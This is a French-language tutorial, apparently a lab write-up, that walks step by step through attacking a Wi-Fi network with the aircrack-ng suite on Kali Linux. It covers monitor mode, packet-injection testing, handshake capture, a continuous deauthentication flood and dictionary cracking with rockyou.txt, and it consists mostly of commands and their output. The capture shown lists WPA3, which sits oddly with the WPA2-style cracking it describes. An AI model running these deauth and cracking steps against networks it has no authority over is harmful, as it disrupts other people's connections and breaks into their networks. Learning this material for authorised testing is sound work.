Pour commencer nous allons prendre notre VM kali sur la quelle nous allons plug une carte wifi externe qui accepte le mode monitor (pour ma part c'est une ALFA AWUS036NNHA).
Une fois plug à nôtre kali nous pouvons nous assurez quelle est bien détecté par le système avec la commande <lsusb>
:
┌──(kali㉿kali)-[~]
└─$ lsusb
Bus 002 Device 002: ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Pour moi c'est la première, elle apparaît sous le nom de : "Qualcomm Atheros Communications AR9271 802.11".
Avec la commande <iwconfig>
nous pouvons voir le mode actuel de la carte (elle nous permet également de voir le nom de l'interface) :
┌──(kali㉿kali)-[~]
└─$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Nous allons arrêtez la carte puis stop tout precessus qui utilise la carte (il est important d'être root pour utiliser la suite aircrack-ng) :
┌──(kali㉿kali)-[~]
└─$ sudo -s
[sudo] Mot de passe de kali :
┌──(root㉿kali)-[/home/kali]
└─# ifconfig wlan0 down
┌──(root㉿kali)-[/home/kali]
└─# airmon-ng check kill
Killing these processes:
PID Name
2370 wpa_supplicant
Ensuite nous mettons la certe en mode monitor et nous redémarrons la carte :
┌──(root㉿kali)-[/home/kali]
└─# iwconfig wlan0 mode monitor
┌──(root㉿kali)-[/home/kali]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
┌──(root㉿kali)-[/home/kali]
└─# ifconfig wlan0 up
Maintenant nousallons faire un test d'injection de paquets :
┌──(root㉿kali)-[/home/kali]
└─# aireplay-ng --test wlan0
20:10:38 Trying broadcast probe requests...
20:10:38 Injection is working!
20:10:40 Found 4 APs
20:10:40 Trying directed probe requests...
20:10:40 **:19:**:AA:**:40 - channel: 1 - 'SFR_****'
20:10:41 Ping (min/avg/max): 3.545ms/32.508ms/84.305ms Power: -49.17
20:10:41 30/30: 100%
20:10:41 **:0C:6B:**:**:8E - channel: 1 - 'SFR_****'
20:10:43 Ping (min/avg/max): 1.582ms/39.841ms/198.426ms Power: -86.96
20:10:43 28/30: 93%
20:10:43 **:2D:1B:**:39:** - channel: 1 - 'SFR_****'
20:10:47 Ping (min/avg/max): 5.082ms/22.694ms/46.298ms Power: -87.00
20:10:47 9/30: 30%
20:10:47 0E:87:AC:76:E8:0B - channel: 6 - 'iPhone'
20:10:49 Ping (min/avg/max): 1.476ms/22.612ms/98.443ms Power: -23.32
20:10:49 28/30: 93%
Ici le réseau qui nous intéresse est le réseau "iPhone". Nous lancerons donc notre attaques sur l'adesse MAC suivante : 0E:87:AC:76:E8:0B.
Vu que nous connaissons l'adresse de MAC du réseau nous pouvons déjà nous concentrer sur le réseau voulu.
Nous allons donc pouvoir lancer une capture de trafic avec airodump-ng.
┌──(root㉿kali)-[/home/kali]
└─# airodump-ng -w capture-trafic -c 6 --bssid 0E:87:AC:76:E8:0B wlan0
CH 6 ][ Elapsed: 1 min ][ 2023-10-27 21:09
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AU
0E:87:AC:76:E8:0B -21 75 789 1 0 6 130 WPA3 CCMP SA
BSSID STATION PWR Rate Lost Frames Notes
0E:87:AC:76:E8:0B 96:BE:CF:0C:6F:E3 -40 0 -24 0 416
Dans cette commande le <-w>
déclare que le fichier "out" serra capture-trafic, le <-c>
déclare le channel qu'utilise le réseau utilisateur et le <--bssid>
déclare l'adresse MAC visée. <wlan0>
est pour l'interface de al carte wifi.
En parrallèle nous lançons des requètes de deauth :
┌──(root㉿kali)-[/home/kali]
└─# aireplay-ng --deauth 0 -a 0E:87:AC:76:E8:0B wlan0
21:08:55 Waiting for beacon frame (BSSID: 0E:87:AC:76:E8:0B) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:08:55 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:56 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:56 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:57 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:57 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:58 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:58 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:59 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:08:59 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:00 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:00 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:01 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:01 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:02 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
21:09:02 Sending DeAuth (code 7) to broadcast -- BSSID: [0E:87:AC:76:E8:0B]
Le <-0>
est pour dire que nous voulions des requètes de deauth à l'infini.
Une fois la capture terminé nous pouvons l'examiner avec aircrack-ng.
┌──(root㉿kali)-[/home/kali]
└─# aircrack-ng capture-trafic-01.cap -w /usr/share/wordlists/rockyou.txt
Si le mot de passe est dans la wordlist aircrack-ng vous affichera une notification avec écrit "KEY FOUND" et ce message serra suivi du mot de passe.